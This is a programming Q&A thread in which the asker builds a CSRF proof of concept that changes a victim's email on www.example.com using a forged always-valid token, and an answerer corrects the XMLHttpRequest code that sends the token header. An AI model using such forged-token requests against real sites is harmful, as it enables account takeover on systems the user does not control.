# Send HTTP Post request to a server with a specified CSRF token

Tags: javascript, html, ajax, token, csrf

**Explanation:**

I am trying to create a CSRF POC, but the problem is that a CSRF-token is required on www.example.com in order to prevent CSRF attacks. 
Luckily, I managed to create a CSRF-Token that is *always* valid; lets say "abcdef". So now I can create a working CSRF POC if only I could send the CSRF-Token with it. 
Is this possible with for instance AJAX? I searched for half an hour but couldn't find any answers on this, but that's on me I guess.

**This is my POC until now:**

```
 <form action="http://www.example.com/change-mail" method="post">
        <input type="submit">
        <input type="hidden" name="email" value="newemail@gmail.com">
        <!-- TODO: Send the CSRF-Token "abcdef" with it too! -->
    </form>
```

*Help is appreciated.*

**Edit @Daniël**

Would something like this work?

**HTML Part:**

```
 <!DOCTYPE html>
 <html>
<head>
    <script type="text/javascript" src="test.js"></script>       
</head>
<body>
<b>Email</b><br><br>
    <form id="email">
        <label for="email">&nbsp;Email&nbsp;&nbsp;&nbsp;:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</label>
        <input type="text" id="email" />
        <br><br>
        <input type="button" id="email" value="email"/>
    </form>
   </body>
</html>
```

**Javascript PART:**

```
    <script>
window.addEventListener('DOMContentLoaded', function() {
var email  = document.querySelector('input#email');


 email.addEventListener('click', function() {
    var emailStr = email.value, 
        url="http://www.example.com/change-mail";
    if (window.XMLHttpRequest) {
        xmlHttpReq = new XMLHttpRequest();
    }
    else if (window.ActiveXObject) {
        xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
    }
    xmlHttpReq.open('POST', url, true);
    xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xmlHttpReq.setRequestHeader('X-CSRF-Token', abcdef);
    xmlHttpReq.send("email="+emailStr);
    </script>
```

Thanks in advance, do I have to handle the response too?
***Right now, when I hit the email button, nothing happens when I log the HTTP requests... too bad.***

Comment: Can you post the javascript of the ajax call?

Comment: What do you mean exactly? To make sure, www.example.com is not my server.

Comment: You need to write javascript code make an ajax call. Have a look at what I mean here: https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Using_XMLHttpRequest#Submitting_forms_and_uploading_files

Comment: I am really trying, but I find it hard... :')

Answer (score 0):

There are a number of issues with your current code, I have corrected it below.

```js
    window.addEventListener('DOMContentLoaded', function() {
    var email  = document.querySelector('input#submit');
 
    email.addEventListener('click', function() {
      var emailStr = email.value, 
      url="http://www.example.com/change-mail";
      if (window.XMLHttpRequest) {
        xmlHttpReq = new XMLHttpRequest();
      }
      else if (window.ActiveXObject) {
        xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
      }
      xmlHttpReq.open('POST', url, true);
      xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      xmlHttpReq.setRequestHeader('X-CSRF-Token', 'abcdef');
      xmlHttpReq.send("email="+emailStr);
    });
  });
```

```html
<!DOCTYPE html>
<html>
  <body>
    <b>Email</b><br><br>
    <form id="emailform">
      <label for="email">&nbsp;Email&nbsp;&nbsp;&nbsp;:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</label>
      <input type="text" id="email" />
      <br><br>
      <input type="button" id="submit" value="email"/>
    </form>
  </body>
</html>
```

**ORIGINAL ANSWER:**
You can add a header to your XMLHttpRequest (ajax) call:

```
xhr.setRequestHeader('X-CSRF-Token', csrf_token);
```

Comment: Thanks Daniël! How do I combine the ajax call and the post parameters. Guess I can't just do:

 `<form action="http://www.example.com/change-mail" method="post">
        <input type="submit">
        <input type="hidden" name="email" value="newemail@gmail.com">
        <script type="text/javascript">
  xhr.setRequestHeader('X-CSRF-Token', csrf_token)
  </script>
    </form>`

Comment: Sorry if this is a dumb question. Am new to ajax and some other ish

Comment: This is a good question which covers some of the javascript ajax form interaction https://stackoverflow.com/questions/20349635/how-to-use-xhr-in-pop-up-window